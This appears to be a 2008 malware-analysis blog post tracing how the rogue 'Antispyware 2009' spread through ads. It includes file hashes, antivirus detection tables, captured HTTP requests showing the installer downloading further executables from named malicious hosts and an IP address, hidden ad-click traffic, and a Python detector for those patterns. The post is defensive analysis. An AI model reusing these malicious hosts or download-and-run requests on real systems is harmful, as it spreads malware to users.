Rogue Antispyware 2009 served through beedly.us ads

Today, while I was browsing the beedly.us website, I saw a suspicious ad link that led to the malicious website proantispyware2009(dot)com, so I started to analyze the link, and below is the result:

Screenshot

So after clicking on the ad I was redirected to a new sub-domain:

Screenshot

and if we view the HTML code, it is possible to see that if we click the remove button we will be prompted to download a file named setup_246_3777_.exe, which is the real setup file of the rogue security software.

Report Generated 13.11.2008 at 20.33.51 (GMT 1)
Filename: setup_246_3777_.exe
File size: 112 KB
MD5 Hash: E9339F9045368947789EC70739DE4B21
SHA1 Hash: DC7B37C1158F5AD4D3E092AFCADE58A5E3FC145B
Application Type: Executable (EXE) 32bit
Detection Rate: 0 on 23

After I executed the .EXE file, we started to get some new traffic:

Screenshot

GET /get/?type=scanner&pin=246&lnd=3777 HTTP/1.1
User-Agent: Installer
Host: dl.storage-antispyware.com

HTTP/1.1 200 OK
Content-Disposition: attachment; filename=scanner_246_3777_.exe
Content-Transfer-Encoding: binary

From this traffic we can see that a new file is downloaded:

filename=scanner_246_3777_.exe

It is the installer for the rogue security software Antispyware 2009!

Report Generated 13.11.2008 at 21.24.07 (GMT 1)
Filename: scanner_246_3777_.exe
File size: 811 KB
MD5 Hash: E0F855C6C5FC93F0A8ED1FE9E702E492
SHA1 Hash: 77ACC5822A5EBD734075BDF4752EC6F10617050F
Detection Rate: 9 on 23

Antivirus Result
a-squared Trojan.Fakealert.ads.1!IK
Avira AntiVir TR/Fakealert.ads.1
Avast Win32:Spyware-gen [Trj] (0)
AVG Trojan horse SHeur.CQDP
BitDefender Trojan.FakeAlert.AKQ
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Win32:Spyware-gen [Trj] B
IkarusT3 Trojan.Fakealert.ads.1
Kaspersky –
McAfee PWCrack-Winspy trojan
NOD32 v3 –
Norman Aggressive commersial W32/AntiVirus2008.TB ()
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –

Next, a new .EXE is downloaded and executed on my system:

GET /mxlivemedia/get_file.php HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141

GET /mxlivemedia/multi/16.exe HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141

and the file is:

Location: multi/16.exe

Report Generated 13.11.2008 at 20.39.42 (GMT 1)
Filename: 16.exe
File size: 598 KB
MD5 Hash: 9A785CF7901E348C1840925EB5E0C5CC
SHA1 Hash: 189EEA8FB44360C5E4011BB471D7F1D8F7B3F7AC
Detection Rate: 2 on 23

Antivirus Result
a-squared –
Avira AntiVir –
Avast –
AVG –
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA –
IkarusT3 –
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee –
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –

After 16.exe is executed, we started to get new traffic from new hosts:

GET /stat.php?func=install&pid=246&ip=127.0.0.1&landing=3777
Host: int.vbvyu.com

GET /smb/nsi_install.php?inst_result=success&hwid=xxx
Host: a2.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)

GET /bc/nsi_install.php?aff_id=mxlivemedia&inst_result=success&id=xxx
Host: a1.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)

and afterwards, IEXPLORE.EXE was launched hidden and the malware started to clickjack the ad links invisibly!

GET /servlet/ajrotator/246392/0/vh?z=icm&dim=186262
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html
Host: rotator.its.adjuggler.com

GET /servlet/ajrotator/7678/0/vh?z=ast&ch=7108&dim=56
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html
Host: servedby.topqualityads.net

GET /bc/ads/300x250/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com

GET /bc/ads/160x600/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com

GET /bc/ads/728x90/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php

GET /bc/ads/728x90/48dcc730ea0ce.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com

POST /bc/123kah.php
Host: a1.mxlivemedia.com
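The three traffic patterns captured above (the non-browser "Installer"/"NSISDL" downloads, the inst_result=success install beacons, and the burst of ad requests all "referred" by a1.mxlivemedia.com from the hidden IEXPLORE.EXE) can be picked out of a proxy or sniffer capture automatically. The following detector is an added example, not code from the original post; it assumes the capture is in the same shape as the blocks above (request line, then headers, blank line between requests) and uses a constructed sample built from those blocks.

```python
import re
from collections import Counter
from urllib.parse import urlsplit
# Constructed sample in the same shape as the captures above (one request per block).
SAMPLE_CAPTURE = """GET /get/?type=scanner&pin=246&lnd=3777 HTTP/1.1
User-Agent: Installer
Host: dl.storage-antispyware.com

GET /smb/nsi_install.php?inst_result=success&hwid=xxx
Host: a2.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)

GET /servlet/ajrotator/246392/0/vh?z=icm&dim=186262
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html
Host: rotator.its.adjuggler.com

GET /bc/ads/300x250/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
"""
DOWNLOADER_AGENTS = ("Installer", "NSISDL/")  # non-browser UAs from the capture
def parse_requests(text):
    """Yield (method, path, headers) per block; header names lowercased."""
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.strip().splitlines()
        method, path = lines[0].split()[:2]
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        yield method, path, headers

def flag_capture(text, burst=2):
    """Return sorted (reason, detail) findings for a request capture."""
    findings = set()
    referer_hosts = Counter()
    for method, path, h in parse_requests(text):
        target = h.get("host", "") + path
        if h.get("user-agent", "").startswith(DOWNLOADER_AGENTS):
            findings.add(("downloader-agent", target))
        if "inst_result=" in path:          # install-success beacon
            findings.add(("install-beacon", target))
        if "referer" in h:
            referer_hosts[urlsplit(h["referer"]).hostname] += 1
    # Several ad requests all "referred" by one host the user never visited: hidden-IE click pattern.
    for ref_host, n in referer_hosts.items():
        if n >= burst:
            findings.add(("ad-click-burst", f"{ref_host} x{n}"))
    return sorted(findings)
```

Calling flag_capture(SAMPLE_CAPTURE) yields the two downloader requests, the install beacon and the ad-click burst attributed to a1.mxlivemedia.com.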

Afterwards, new files were created in system32:

Screenshot

Report Generated 13.11.2008 at 20.50.00 (GMT 1)
Filename: msclgkhvhfp.dll
File size: 173 KB
MD5 Hash: 8532E92178E9126A151E31683D896C31
SHA1 Hash: 088E2728D8D7D5E185AF231F54D917605F7CED24
Detection Rate: 6 on 23

Antivirus Result
a-squared Generic.Adw.Rotator!IK
Avira AntiVir –
Avast –
AVG –
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Trojan-Clicker.Win32.Agent.evi A
IkarusT3 Generic.Adw.Rotator
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee AdClicker-GI trojan
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –

Below are the IEXPLORE.EXE connections:

Screenshot

And finally the image of the rogue security software Antispyware 2009 appeared on the screen:

Screenshot

I have created a small summary of the activity that happened during this analysis:

Screenshot

And after reading the SophosLabs article that steve posted in the comments, I analyzed the file setup_246_3777_.exe with OllyDbg, and below are some images:

Original Entry Point:

Screenshot

Now, if I follow the address CALL 0040116D, I arrive at the code shown in the image below:

Screenshot

And now, if I follow the address MOV EDX,00405DEC, I arrive at the code shown in the image below, which is full of zero bytes (similar to the SophosLabs analysis):

Screenshot

And to finish, below I have added some images of the fake alerts shown by Pro Antispyware 2009:

Fake alert

Make sure not to fall for this scam; if your computer is infected with Antispyware 2009, it is recommended to remove it immediately and to scan your system with NoVirusThanks Malware Remover.
